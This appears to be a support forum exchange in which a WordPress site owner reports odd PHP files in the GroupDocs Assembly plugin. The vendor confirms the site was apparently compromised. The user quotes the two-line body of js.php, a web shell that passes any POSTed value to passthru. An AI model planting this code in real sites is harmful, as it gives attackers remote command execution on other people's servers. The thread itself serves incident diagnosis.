We are using groupdocs in a wordpress site (latest version)
Fairly standard looking files are found in plugins/groupdocs-assembly
Inside the js directory however there are very large files called:
js.php libso2.php libso44.php libso46.php libso47.php libso48.php
the js.php has the following code (I have removed the <?php and ?>
echo “javaversion1”;
passthru($_POST[libso]);
Are these expected files or have we been attacked?
thank you for your help
Hello,
Thank you for the question. Yes, looks like you was attacked because our GroupDocs.Assembly plugin doesn’t have such files. For example you can check which files should be in the plugin here (download or clone the repository and unzip the package).
Best regards.